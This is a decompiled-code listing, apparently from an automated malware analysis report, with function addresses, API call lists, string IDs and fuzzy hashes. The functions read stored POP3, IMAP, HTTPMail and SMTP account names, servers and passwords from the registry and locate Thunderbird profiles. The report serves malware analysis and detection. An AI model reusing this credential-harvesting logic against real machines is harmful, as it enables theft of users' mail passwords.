				void* _t114;

				_t114 = __fp0;
				_t92 = __ecx;
				_t103 = _t105 - 0x6c;
				_t106 = _t105 - 0x474;
				 *(_t103 + 0x4c) = "POP3 User Name";
				 *(_t103 + 0x50) = "IMAP User Name";
				 *(_t103 + 0x54) = "HTTPMail User Name";
				 *(_t103 + 0x58) = "SMTP USer Name";
				 *(_t103 + 0x1c) = "POP3 Server";
				 *(_t103 + 0x20) = "IMAP Server";
				 *(_t103 + 0x24) = "HTTPMail Server";
				 *(_t103 + 0x28) = "SMTP Server";
				 *(_t103 + 0x3c) = "POP3 Password2";
				 *(_t103 + 0x40) = "IMAP Password2";
				 *(_t103 + 0x44) = "HTTPMail Password2";
				 *(_t103 + 0x48) = "SMTP Password2";
				 *(_t103 + 0x2c) = "POP3 Port";
				 *(_t103 + 0x30) = "IMAP Port";
				 *(_t103 + 0x34) = "HTTPMail Port";
				 *(_t103 + 0x38) = "SMTP Port";
				 *(_t103 + 0x5c) = "POP3 Secure Connection";
				 *(_t103 + 0x60) = "IMAP Secure Connection";
				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
				 *(_t103 + 0x68) = "SMTP Secure Connection";
				_t90 = 0;
				do {
					 *(_t103 - 0x64) = 0;
					memset(_t103 - 0x63, 0, 0x7f);
					_push(_t103 - 0x64);
					_t96 = _t90 << 2;
					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
					_push( *((intOrPtr*)(_t103 + 0x78)));
					_t58 = 0x7f;
					_t59 = E0040EB80(_t58, _t92);
					_t106 = _t106 + 0x18;
					if(_t59 == 0) {
						E004021D8(_t103 - 0x408);
						strcpy(_t103 - 0x1f4, _t103 - 0x64);
						_t100 =  *((intOrPtr*)(_t103 + 0x78));
						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
						_t34 = _t90 + 1; // 0x1
						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
						_push(_t103 - 0x2f8);
						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
						_push(_t100);
						_t67 = 0x7f;
						E0040EB80(_t67, _t92);
						_push(_t103 - 0x3fc);
						_push("SMTP Display Name");
						_push(_t100);
						_t70 = 0x7f;
						E0040EB80(_t70, _t92);
						_push(_t103 - 0x378);
						_push("SMTP Email Address");
						_push(_t100);
						_t73 = 0x7f;
						E0040EB80(_t73, _t92);
						_t108 = _t106 + 0x2c;
						if(_t90 != 3) {
							_push(_t103 - 0x278);
							_push("SMTP Server");
							_push(_t100);
							_t87 = 0x7f;
							E0040EB80(_t87, _t92);
							_t108 = _t108 + 0xc;
						}
						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
						_t106 = _t108 + 0x18;
						_t101 =  *((intOrPtr*)(_t103 + 0x74));
						E0040246C(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
						_pop(_t92);
						_t59 = E00402407(_t103 - 0x408, _t114, _t101);
					}
					_t90 = _t90 + 1;
				} while (_t90 < 4);
				return _t59;
			}




















                                                                                              0x00402606
                                                                                              0x00402606
                                                                                              0x00402607
                                                                                              0x0040260b
                                                                                              0x00402614
                                                                                              0x0040261b
                                                                                              0x00402622
                                                                                              0x00402629
                                                                                              0x00402630
                                                                                              0x00402637
                                                                                              0x0040263e
                                                                                              0x00402645
                                                                                              0x0040264c
                                                                                              0x00402653
                                                                                              0x0040265a
                                                                                              0x00402661
                                                                                              0x00402668
                                                                                              0x0040266f
                                                                                              0x00402676
                                                                                              0x0040267d
                                                                                              0x00402684
                                                                                              0x0040268b
                                                                                              0x00402692
                                                                                              0x00402699
                                                                                              0x004026a0
                                                                                              0x004026a2
                                                                                              0x004026aa
                                                                                              0x004026ae
                                                                                              0x004026b6
                                                                                              0x004026b9
                                                                                              0x004026bc
                                                                                              0x004026c0
                                                                                              0x004026c5
                                                                                              0x004026c6
                                                                                              0x004026cb
                                                                                              0x004026d0
                                                                                              0x004026dc
                                                                                              0x004026ec
                                                                                              0x004026f4
                                                                                              0x004026f7
                                                                                              0x004026fd
                                                                                              0x00402700
                                                                                              0x0040270c
                                                                                              0x0040270d
                                                                                              0x00402711
                                                                                              0x00402714
                                                                                              0x00402715
                                                                                              0x00402720
                                                                                              0x00402721
                                                                                              0x00402726
                                                                                              0x00402729
                                                                                              0x0040272a
                                                                                              0x00402735
                                                                                              0x00402736
                                                                                              0x0040273b
                                                                                              0x0040273e
                                                                                              0x0040273f
                                                                                              0x00402744
                                                                                              0x0040274a
                                                                                              0x00402752
                                                                                              0x00402753
                                                                                              0x00402758
                                                                                              0x0040275b
                                                                                              0x0040275c
                                                                                              0x00402761
                                                                                              0x00402761
                                                                                              0x0040276d
                                                                                              0x0040277b
                                                                                              0x00402780
                                                                                              0x00402791
                                                                                              0x00402796
                                                                                              0x004027a9
                                                                                              0x004027af
                                                                                              0x004027b7
                                                                                              0x004027b7
                                                                                              0x004027bc
                                                                                              0x004027bd
                                                                                              0x004027cd

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004026AE
                                                                                                • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                              • strcpy.MSVCRT(?,?,?,?,?,7554ED80,?,00000000), ref: 004026EC
                                                                                              • strcpy.MSVCRT(?,?), ref: 004027A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$QueryValuememset
                                                                                              • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                              • API String ID: 3373037483-1627711381
                                                                                              • Opcode ID: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                              • Instruction ID: d93c2979c5964ee18a3e8d610d8756237e52e0a5809c5516356d8c5187ea57d6
                                                                                              • Opcode Fuzzy Hash: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                              • Instruction Fuzzy Hash: E04186B190021CAADB10DF91DE49ADE37B8EF04348F10446BFD18E7191D3B89699CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004027D0, Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 118stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 97%
                                                                                              			E004027D0(void* __fp0) {
				void* __esi;
				void* _t66;
				signed int _t92;
				void* _t95;
				intOrPtr _t109;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t121;

				_t121 = __fp0;
				_t111 = _t113 - 0x70;
				_t114 = _t113 - 0x474;
				 *(_t111 + 0x40) = "POP3 Password";
				 *(_t111 + 0x44) = "IMAP Password";
				 *(_t111 + 0x48) = "HTTP Password";
				 *(_t111 + 0x4c) = "SMTP Password";
				 *(_t111 + 0x50) = "POP3 User";
				 *(_t111 + 0x54) = "IMAP User";
				 *(_t111 + 0x58) = "HTTP User";
				 *(_t111 + 0x5c) = "SMTP User";
				 *(_t111 + 0x20) = "POP3 Server";
				 *(_t111 + 0x24) = "IMAP Server";
				 *(_t111 + 0x28) = "HTTP Server URL";
				 *(_t111 + 0x2c) = "SMTP Server";
				 *(_t111 + 0x30) = "POP3 Port";
				 *(_t111 + 0x34) = "IMAP Port";
				 *(_t111 + 0x38) = "HTTP Port";
				 *(_t111 + 0x3c) = "SMTP Port";
				 *(_t111 + 0x60) = "POP3 Use SPA";
				 *(_t111 + 0x64) = "IMAP Use SPA";
				 *(_t111 + 0x68) = "HTTPMail Use SSL";
				 *(_t111 + 0x6c) = "SMTP Use SSL";
				_t92 = 0;
				do {
					 *(_t111 - 0x60) = 0;
					memset(_t111 - 0x5f, 0, 0x7f);
					_t114 = _t114 + 0xc;
					_t100 = _t92 << 2;
					_t66 = E004029A7(_t111 - 0x60,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + (_t92 << 2) + 0x50)));
					if(_t66 != 0) {
						E004021D8(_t111 - 0x404);
						strcpy(_t111 - 0x1f0, _t111 - 0x60);
						_pop(_t95);
						 *((intOrPtr*)(_t111 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x78)) + 0xb1c));
						_t37 = _t92 + 1; // 0x1
						 *((intOrPtr*)(_t111 - 0x1f4)) = _t37;
						E004029A7(_t111 - 0x2f4,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x20)));
						E004029A7(_t111 - 0x3f8,  *((intOrPtr*)(_t111 + 0x7c)), "Display Name");
						E004029A7(_t111 - 0x374,  *((intOrPtr*)(_t111 + 0x7c)), "Email");
						if(_t92 != 3) {
							E004029A7(_t111 - 0x274,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Server");
							E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Port", _t111 - 0x68);
							_t114 = _t114 + 0xc;
						}
						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x30)), _t111 - 0x70);
						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x60)), _t111 - 0x6c);
						_t109 =  *((intOrPtr*)(_t111 + 0x78));
						_t114 = _t114 + 0x18;
						E0040246C(_t109, _t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x40)), _t111 - 0x170, 1);
						strcpy(_t111 - 0xf0, _t109 + 0xa9c);
						_t66 = E00402407(_t111 - 0x404, _t121, _t109);
					}
					_t92 = _t92 + 1;
				} while (_t92 < 4);
				return _t66;
			}












                                                                                              0x004027d0
                                                                                              0x004027d1
                                                                                              0x004027d5
                                                                                              0x004027de
                                                                                              0x004027e5
                                                                                              0x004027ec
                                                                                              0x004027f3
                                                                                              0x004027fa
                                                                                              0x00402801
                                                                                              0x00402808
                                                                                              0x0040280f
                                                                                              0x00402816
                                                                                              0x0040281d
                                                                                              0x00402824
                                                                                              0x0040282b
                                                                                              0x00402832
                                                                                              0x00402839
                                                                                              0x00402840
                                                                                              0x00402847
                                                                                              0x0040284e
                                                                                              0x00402855
                                                                                              0x0040285c
                                                                                              0x00402863
                                                                                              0x0040286a
                                                                                              0x0040286c
                                                                                              0x00402874
                                                                                              0x00402878
                                                                                              0x0040287d
                                                                                              0x00402882
                                                                                              0x0040288f
                                                                                              0x00402896
                                                                                              0x004028a2
                                                                                              0x004028b2
                                                                                              0x004028c1
                                                                                              0x004028c6
                                                                                              0x004028cf
                                                                                              0x004028d8
                                                                                              0x004028de
                                                                                              0x004028f1
                                                                                              0x00402904
                                                                                              0x0040290c
                                                                                              0x0040291c
                                                                                              0x0040292d
                                                                                              0x00402932
                                                                                              0x00402932
                                                                                              0x00402940
                                                                                              0x00402950
                                                                                              0x00402955
                                                                                              0x00402958
                                                                                              0x0040296d
                                                                                              0x00402980
                                                                                              0x0040298e
                                                                                              0x0040298e
                                                                                              0x00402993
                                                                                              0x00402994
                                                                                              0x004029a4

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00402878
                                                                                                • Part of subcall function 004029A7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029E9
                                                                                              • strcpy.MSVCRT(?,?,7554ED80,?,00000000), ref: 004028B2
                                                                                              • strcpy.MSVCRT(?,?,?,?,?,?,?,?,7554ED80,?,00000000), ref: 00402980
                                                                                                • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$ByteCharMultiQueryValueWidememset
                                                                                              • String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                              • API String ID: 2416467034-4086712241
                                                                                              • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                              • Instruction ID: 2a04afc1b401ca52673312b513a052c1616a462ab9372f8060d899744f0eb97e
                                                                                              • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                              • Instruction Fuzzy Hash: FF513EB150025DABCF24DF61DE499DD7BB8FF04308F10416AF924A6191D3B999A9CF88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F435, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 168stringregistryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 81%
                                                                                              			E0040F435(CHAR* __eax) {
				void* _v8;
				int _v12;
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void _v787;
				char _v788;
				void _v1051;
				char _v1052;
				void _v2075;
				char _v2076;
				void* __esi;
				void* _t45;
				void* _t59;
				char* _t60;
				char* _t71;
				char* _t75;
				void* _t84;
				CHAR* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;

				_t89 = __eax;
				_v1052 = 0;
				memset( &_v1051, 0, 0x104);
				_v788 = 0;
				memset( &_v787, 0, 0xff);
				 *_t89 = 0;
				_t45 = E0040EB3F(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
				_t91 = _t90 + 0x24;
				if(_t45 != 0) {
					L12:
					strcpy(_t89,  &_v1052);
					if( *_t89 == 0) {
						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
						if(E0040F3BA(_t89) == 0) {
							 *_t89 = 0;
						}
						if( *_t89 == 0) {
							E00406172(_t89);
							if(E0040F3BA(_t89) == 0) {
								 *_t89 = 0;
							}
							if( *_t89 == 0) {
								GetCurrentDirectoryA(0x104, _t89);
								if(E0040F3BA(_t89) == 0) {
									 *_t89 = 0;
								}
							}
						}
					}
					return 0 |  *_t89 != 0x00000000;
				} else {
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					_v12 = 0;
					_t59 = E0040EC05(_v8, 0,  &_v268);
					_t92 = _t91 + 0x18;
					while(_t59 == 0) {
						_push(7);
						_t60 =  &_v268;
						_push("mozilla");
						_push(_t60);
						L00411642();
						_t93 = _t92 + 0xc;
						if(_t60 == 0) {
							_v532 = 0;
							memset( &_v531, 0, 0x104);
							_v2076 = 0;
							memset( &_v2075, 0, 0x3ff);
							_push( &_v268);
							_push("%s\\bin");
							_push(0x3ff);
							_push( &_v2076);
							L00411648();
							E0040EBC1(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
							_t71 =  &_v532;
							_push(0x5c);
							_push(_t71);
							L0041164E();
							_t93 = _t93 + 0x44;
							if(_t71 != 0) {
								 *_t71 = 0;
							}
							if(_v532 != 0 && E0040F3BA( &_v532) != 0) {
								_push( &_v788);
								_t75 =  &_v268;
								L004115C4();
								_t84 = _t75;
								if(_t75 > 0) {
									strcpy( &_v1052,  &_v532);
									strcpy( &_v788,  &_v268);
									_t93 = _t93 + 0x10;
								}
							}
						}
						_v12 = _v12 + 1;
						_t59 = E0040EC05(_v8, _v12,  &_v268);
						_t92 = _t93 + 0xc;
					}
					RegCloseKey(_v8);
					goto L12;
				}
			}



























                                                                                              0x0040f449
                                                                                              0x0040f453
                                                                                              0x0040f459
                                                                                              0x0040f46b
                                                                                              0x0040f471
                                                                                              0x0040f484
                                                                                              0x0040f486
                                                                                              0x0040f48b
                                                                                              0x0040f490
                                                                                              0x0040f5e6
                                                                                              0x0040f5ee
                                                                                              0x0040f5f7
                                                                                              0x0040f600
                                                                                              0x0040f60e
                                                                                              0x0040f610
                                                                                              0x0040f610
                                                                                              0x0040f614
                                                                                              0x0040f616
                                                                                              0x0040f623
                                                                                              0x0040f625
                                                                                              0x0040f625
                                                                                              0x0040f629
                                                                                              0x0040f62d
                                                                                              0x0040f63b
                                                                                              0x0040f63d
                                                                                              0x0040f63d
                                                                                              0x0040f63b
                                                                                              0x0040f629
                                                                                              0x0040f614
                                                                                              0x0040f64a
                                                                                              0x0040f496
                                                                                              0x0040f4a3
                                                                                              0x0040f4a9
                                                                                              0x0040f4b9
                                                                                              0x0040f4bc
                                                                                              0x0040f4c1
                                                                                              0x0040f5d5
                                                                                              0x0040f4c9
                                                                                              0x0040f4cb
                                                                                              0x0040f4d1
                                                                                              0x0040f4d6
                                                                                              0x0040f4d7
                                                                                              0x0040f4dc
                                                                                              0x0040f4e1
                                                                                              0x0040f4f0
                                                                                              0x0040f4f6
                                                                                              0x0040f508
                                                                                              0x0040f50e
                                                                                              0x0040f519
                                                                                              0x0040f51a
                                                                                              0x0040f525
                                                                                              0x0040f52a
                                                                                              0x0040f52b
                                                                                              0x0040f547
                                                                                              0x0040f54c
                                                                                              0x0040f552
                                                                                              0x0040f554
                                                                                              0x0040f555
                                                                                              0x0040f55a
                                                                                              0x0040f55f
                                                                                              0x0040f561
                                                                                              0x0040f561
                                                                                              0x0040f569
                                                                                              0x0040f581
                                                                                              0x0040f582
                                                                                              0x0040f589
                                                                                              0x0040f591
                                                                                              0x0040f592
                                                                                              0x0040f5a2
                                                                                              0x0040f5b5
                                                                                              0x0040f5ba
                                                                                              0x0040f5ba
                                                                                              0x0040f592
                                                                                              0x0040f569
                                                                                              0x0040f5bd
                                                                                              0x0040f5cd
                                                                                              0x0040f5d2
                                                                                              0x0040f5d2
                                                                                              0x0040f5e0
                                                                                              0x00000000
                                                                                              0x0040f5e0

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F459
                                                                                              • memset.MSVCRT ref: 0040F471
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                              • memset.MSVCRT ref: 0040F4A9
                                                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                              • _mbsnbicmp.MSVCRT ref: 0040F4D7
                                                                                              • memset.MSVCRT ref: 0040F4F6
                                                                                              • memset.MSVCRT ref: 0040F50E
                                                                                              • _snprintf.MSVCRT ref: 0040F52B
                                                                                              • _mbsrchr.MSVCRT ref: 0040F555
                                                                                              • _mbsicmp.MSVCRT ref: 0040F589
                                                                                              • strcpy.MSVCRT(?,?,?), ref: 0040F5A2
                                                                                              • strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
                                                                                              • RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
                                                                                              • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                              • API String ID: 3269028891-3267283505
                                                                                              • Opcode ID: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                                                              • Instruction ID: bd4ffbb0b4c73fbe97c341744dc0c87608cd01b58ef3e3991875b3aaf34b88fb
                                                                                              • Opcode Fuzzy Hash: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                                                              • Instruction Fuzzy Hash: 5251A77284425DBADB31D7A18C46EDA7ABC9F14344F0404FBF645E2152EA788FC98B68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F126, Relevance: 27.1, APIs: 12, Strings: 6, Instructions: 101stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 95%
                                                                                              			E0040F126(void* __edi, char* _a4, char* _a8) {
				int _v8;
				void _v263;
				char _v264;
				void _v519;
				char _v520;
				intOrPtr _t32;
				void* _t58;
				char* _t60;
				void* _t61;
				void* _t62;

				_t58 = __edi;
				_v264 = 0;
				memset( &_v263, 0, 0xfe);
				_v520 = 0;
				memset( &_v519, 0, 0xfe);
				_t62 = _t61 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
					_v8 = 0;
				}
				_t60 = _a4;
				 *_t60 = 0;
				if(_v8 != 0) {
					strcpy(_t60, "<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						sprintf( &_v264, " size=\"%d\"", _t32);
						strcat(_t60,  &_v264);
						_t62 = _t62 + 0x14;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						sprintf( &_v264, " color=\"#%s\"", E0040F071(_t33,  &_v520));
						strcat(_t60,  &_v264);
					}
					strcat(_t60, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "<b>");
				}
				strcat(_t60, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "</b>");
				}
				if(_v8 != 0) {
					strcat(_t60, "</font>");
				}
				return _t60;
			}













                                                                                              0x0040f126
                                                                                              0x0040f141
                                                                                              0x0040f147
                                                                                              0x0040f155
                                                                                              0x0040f15b
                                                                                              0x0040f160
                                                                                              0x0040f167
                                                                                              0x0040f16e
                                                                                              0x0040f175
                                                                                              0x0040f175
                                                                                              0x0040f17b
                                                                                              0x0040f17e
                                                                                              0x0040f180
                                                                                              0x0040f188
                                                                                              0x0040f18d
                                                                                              0x0040f194
                                                                                              0x0040f1a3
                                                                                              0x0040f1b0
                                                                                              0x0040f1b5
                                                                                              0x0040f1b5
                                                                                              0x0040f1b8
                                                                                              0x0040f1be
                                                                                              0x0040f1da
                                                                                              0x0040f1e7
                                                                                              0x0040f1ec
                                                                                              0x0040f1f5
                                                                                              0x0040f1fb
                                                                                              0x0040f1ff
                                                                                              0x0040f207
                                                                                              0x0040f20d
                                                                                              0x0040f212
                                                                                              0x0040f21c
                                                                                              0x0040f224
                                                                                              0x0040f22a
                                                                                              0x0040f22e
                                                                                              0x0040f236
                                                                                              0x0040f23c
                                                                                              0x0040f242

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F147
                                                                                              • memset.MSVCRT ref: 0040F15B
                                                                                              • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
                                                                                              • sprintf.MSVCRT ref: 0040F1A3
                                                                                              • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
                                                                                              • sprintf.MSVCRT ref: 0040F1DA
                                                                                              • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
                                                                                              • strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
                                                                                              • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F207
                                                                                              • strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
                                                                                              • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F224
                                                                                              • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F236
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcat$memsetsprintf$strcpy
                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                              • API String ID: 1662040868-1996832678
                                                                                              • Opcode ID: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                              • Instruction ID: 418722c3eca89b157b40b8f143ba28d640e3e929850bbea17599129c1cdb8299
                                                                                              • Opcode Fuzzy Hash: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                              • Instruction Fuzzy Hash: 3F31D5B2841615BAC720AB55ED82DCAB36C9F10364F6041BFF215B31C2DA7C9FC48B98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040AF17, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040AF17(void* __eax, intOrPtr _a4) {
				char _v271;
				char _v532;
				intOrPtr _v536;
				char _v540;
				void _v803;
				char _v804;
				void* __ebx;
				void* __edi;
				char* _t47;
				intOrPtr _t67;
				WINDOWPLACEMENT* _t73;
				void* _t75;
				char* _t83;
				struct HWND__* _t84;
				intOrPtr _t88;
				int _t90;

				_t75 = __eax;
				_v804 = 0;
				memset( &_v803, 0, 0x104);
				GetModuleFileNameA(0,  &_v804, 0x104);
				_t47 = strrchr( &_v804, 0x2e);
				if(_t47 != 0) {
					 *_t47 = 0;
				}
				strcat( &_v804, ".cfg");
				_v536 = _a4;
				_v540 = 0x413bdc;
				_v532 = 0;
				_v271 = 0;
				strcpy( &_v532,  &_v804);
				strcpy( &_v271, "General");
				_t88 =  *((intOrPtr*)(_t75 + 0x36c));
				 *((intOrPtr*)(_v540 + 4))("ShowGridLines", _t88 + 4, 0);
				 *((intOrPtr*)(_v540 + 8))("SaveFilterIndex", _t88 + 8, 0);
				 *((intOrPtr*)(_v540 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);
				 *((intOrPtr*)(_v540 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);
				_t67 = _v536;
				_a4 = _t67;
				_t90 = 0x2c;
				if(_t67 != 0) {
					_t84 =  *(_t75 + 0x108);
					if(_t84 != 0) {
						_t73 = _t75 + 0x128;
						_t73->length = _t90;
						GetWindowPlacement(_t84, _t73);
					}
				}
				_t83 =  &_v540;
				 *((intOrPtr*)(_v540 + 0xc))("WinPos", _t75 + 0x128, _t90);
				if(_a4 == 0) {
					E00401896(_t75);
				}
				return E00408671( *((intOrPtr*)(_t75 + 0x370)), _t83,  &_v540);
			}



















                                                                                              0x0040af29
                                                                                              0x0040af35
                                                                                              0x0040af3c
                                                                                              0x0040af4d
                                                                                              0x0040af5c
                                                                                              0x0040af65
                                                                                              0x0040af67
                                                                                              0x0040af67
                                                                                              0x0040af76
                                                                                              0x0040af7e
                                                                                              0x0040af92
                                                                                              0x0040af9c
                                                                                              0x0040afa3
                                                                                              0x0040afaa
                                                                                              0x0040afbb
                                                                                              0x0040afc0
                                                                                              0x0040afdf
                                                                                              0x0040aff8
                                                                                              0x0040b011
                                                                                              0x0040b02a
                                                                                              0x0040b02d
                                                                                              0x0040b037
                                                                                              0x0040b03a
                                                                                              0x0040b03b
                                                                                              0x0040b03d
                                                                                              0x0040b045
                                                                                              0x0040b047
                                                                                              0x0040b04f
                                                                                              0x0040b051
                                                                                              0x0040b051
                                                                                              0x0040b045
                                                                                              0x0040b06a
                                                                                              0x0040b070
                                                                                              0x0040b076
                                                                                              0x0040b078
                                                                                              0x0040b078
                                                                                              0x0040b092

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040AF3C
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040AF4D
                                                                                              • strrchr.MSVCRT ref: 0040AF5C
                                                                                              • strcat.MSVCRT(00000000,.cfg), ref: 0040AF76
                                                                                              • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040AFAA
                                                                                              • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040AFBB
                                                                                              • GetWindowPlacement.USER32(?,?), ref: 0040B051
                                                                                              Strings
